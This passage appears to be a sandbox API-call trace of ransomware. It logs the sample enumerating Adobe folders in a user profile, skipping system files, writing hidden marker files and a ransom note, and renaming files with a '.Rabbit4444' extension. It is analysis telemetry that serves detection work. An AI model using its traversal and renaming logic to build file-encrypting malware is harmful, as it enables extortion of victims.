FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7983c6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7b7983c6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe9695420, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0053.847] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.847] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.847] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.847] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.847] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7983c6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7b7983c6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe9695420, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.847] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.847] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.847] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.847] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.847] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.847] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9695420, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9695420, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe96bb64a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.847] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.847] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.847] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7983c6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x86e93380, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x86e93380, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sonar1.0", cAlternateFileName="")) returned 1 [0053.847] lstrcmpiW (lpString1="Sonar1.0", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.847] lstrcmpiW (lpString1="Sonar1.0", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.847] lstrcmpiW (lpString1="Sonar1.0", lpString2="Rabbit4444.exe") returned 1 [0053.847] lstrcmpiW (lpString1="Sonar1.0", lpString2=".") returned 1 [0053.847] lstrcmpiW (lpString1="Sonar1.0", lpString2="..") returned 1 [0053.847] lstrcmpiW (lpString1="Sonar1.0", lpString2="windows") returned -1 [0053.847] lstrcmpiW (lpString1="Sonar1.0", lpString2="bootmgr") returned 1 [0053.847] lstrcmpiW (lpString1="Sonar1.0", lpString2="pagefile.sys") returned 1 [0053.847] lstrcmpiW (lpString1="Sonar1.0", lpString2="boot") returned 1 [0053.847] lstrcmpiW (lpString1="Sonar1.0", lpString2="ids.txt") returned 1 [0053.847] lstrcmpiW (lpString1="Sonar1.0", lpString2="NTUSER.DAT") returned 1 [0053.847] lstrcpyW (in: lpString1=0x130eb90, lpString2="Sonar1.0" | out: lpString1="Sonar1.0") returned="Sonar1.0" [0053.847] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63e8 [0053.847] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6a) returned 0x117608 [0053.847] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63f0 | out: ListHead=0xf68b0, ListEntry=0xf63f0) returned 0xf63b0 [0053.847] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7983c6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x86e93380, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x86e93380, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sonar1.0", cAlternateFileName="")) returned 0 [0053.848] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0053.848] lstrcpyW (in: lpString1=0x130eb90, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.848] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\sonar\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.848] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.848] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.848] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.848] CloseHandle (hObject=0x278) returned 1 [0053.848] CloseHandle (hObject=0x27c) returned 1 [0053.849] GetCurrentThreadId () returned 0xd98 [0053.849] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63f0 [0053.849] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0" [0053.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0053.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63e8 | out: hHeap=0xe0000) returned 1 [0053.849] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0" [0053.849] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\" [0053.849] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\.BFC0E91B00AE8A0620D3" [0053.849] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.849] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.852] FlushFileBuffers (hFile=0x27c) returned 1 [0053.853] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.853] CloseHandle (hObject=0x27c) returned 1 [0053.853] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0") returned 52 [0053.853] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.853] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7983c6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x86e93380, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0xe96bb64a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0053.853] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.853] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.853] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.853] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.853] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7983c6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x86e93380, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0xe96bb64a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.854] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.854] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.854] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.854] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.854] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.854] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe96bb64a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe96bb64a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe96bb64a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.854] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.854] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.854] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86e93380, ftCreationTime.dwHighDateTime=0x1d327cd, ftLastAccessTime.dwLowDateTime=0x86e93380, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x64c770e4, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x4949, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sonar_policy.xml", cAlternateFileName="SONAR_~1.XML")) returned 1 [0053.854] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.854] lstrcmpiW (lpString1="sonar_policy.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.854] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="Rabbit4444.exe") returned 1 [0053.854] lstrcmpiW (lpString1="sonar_policy.xml", lpString2=".") returned 1 [0053.854] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="..") returned 1 [0053.854] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="windows") returned -1 [0053.854] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="bootmgr") returned 1 [0053.854] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="pagefile.sys") returned 1 [0053.854] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="boot") returned 1 [0053.854] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="ids.txt") returned 1 [0053.854] lstrcmpiW (lpString1="sonar_policy.xml", lpString2="NTUSER.DAT") returned 1 [0053.854] lstrcpyW (in: lpString1=0x130eba2, lpString2="sonar_policy.xml" | out: lpString1="sonar_policy.xml") returned="sonar_policy.xml" [0053.854] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml", dwFileAttributes=0x0) returned 1 [0053.855] lstrlenW (lpString="sonar_policy.xml") returned 16 [0053.855] lstrlenW (lpString="Rabbit4444") returned 10 [0053.856] lstrcmpiW (lpString1="policy.xml", lpString2="Rabbit4444") returned -1 [0053.856] lstrlenW (lpString=".dll") returned 4 [0053.856] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0053.856] lstrlenW (lpString=".lnk") returned 4 [0053.856] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0053.856] lstrlenW (lpString=".ini") returned 4 [0053.856] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0053.856] lstrlenW (lpString=".sys") returned 4 [0053.856] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0053.856] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\sonar_policy.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.856] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.856] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14516673870) returned 1 [0053.856] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=18761) returned 1 [0053.856] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0053.856] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0053.856] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4c50, lpName=0x0) returned 0x298 [0053.857] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4c50) returned 0x70000 [0053.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.860] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0053.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.860] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0053.860] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0053.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0053.860] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14517070549) returned 1 [0053.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0053.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0053.860] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.860] CloseHandle (hObject=0x298) returned 1 [0053.860] CloseHandle (hObject=0x278) returned 1 [0053.860] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml.Rabbit4444") returned 80 [0053.860] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\sonar_policy.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\sonar_policy.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\sonar_policy.xml.rabbit4444"), dwFlags=0x1) returned 1 [0053.861] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86e93380, ftCreationTime.dwHighDateTime=0x1d327cd, ftLastAccessTime.dwLowDateTime=0x86e93380, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x64c770e4, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x4949, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sonar_policy.xml", cAlternateFileName="SONAR_~1.XML")) returned 0 [0053.861] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0053.861] lstrcpyW (in: lpString1=0x130eba2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.861] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\sonar\\sonar1.0\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.863] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.863] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.865] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.865] CloseHandle (hObject=0x278) returned 1 [0053.865] CloseHandle (hObject=0x27c) returned 1 [0053.865] GetCurrentThreadId () returned 0xd98 [0053.865] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63b0 [0053.865] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2" [0053.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120958 | out: hHeap=0xe0000) returned 1 [0053.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63a8 | out: hHeap=0xe0000) returned 1 [0053.865] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2" [0053.865] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\" [0053.865] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\.BFC0E91B00AE8A0620D3" [0053.865] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\logtransport2\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.872] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.874] FlushFileBuffers (hFile=0x27c) returned 1 [0053.875] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.876] CloseHandle (hObject=0x27c) returned 1 [0053.876] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2") returned 51 [0053.876] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.876] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715ca081, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7894b39b, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe96e18b7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0053.876] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.877] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.877] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.877] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.877] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715ca081, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7894b39b, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe96e18b7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.877] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.877] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.877] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.877] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.877] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.877] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe96e18b7, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe96e18b7, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9707a96, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.877] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.877] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.877] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7894b39b, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x6606ebca, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x6606ebca, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0053.877] lstrcmpiW (lpString1="Logs", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.877] lstrcmpiW (lpString1="Logs", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.877] lstrcmpiW (lpString1="Logs", lpString2="Rabbit4444.exe") returned -1 [0053.877] lstrcmpiW (lpString1="Logs", lpString2=".") returned 1 [0053.877] lstrcmpiW (lpString1="Logs", lpString2="..") returned 1 [0053.877] lstrcmpiW (lpString1="Logs", lpString2="windows") returned -1 [0053.877] lstrcmpiW (lpString1="Logs", lpString2="bootmgr") returned 1 [0053.877] lstrcmpiW (lpString1="Logs", lpString2="pagefile.sys") returned -1 [0053.877] lstrcmpiW (lpString1="Logs", lpString2="boot") returned 1 [0053.877] lstrcmpiW (lpString1="Logs", lpString2="ids.txt") returned 1 [0053.877] lstrcmpiW (lpString1="Logs", lpString2="NTUSER.DAT") returned -1 [0053.877] lstrcpyW (in: lpString1=0x130eba0, lpString2="Logs" | out: 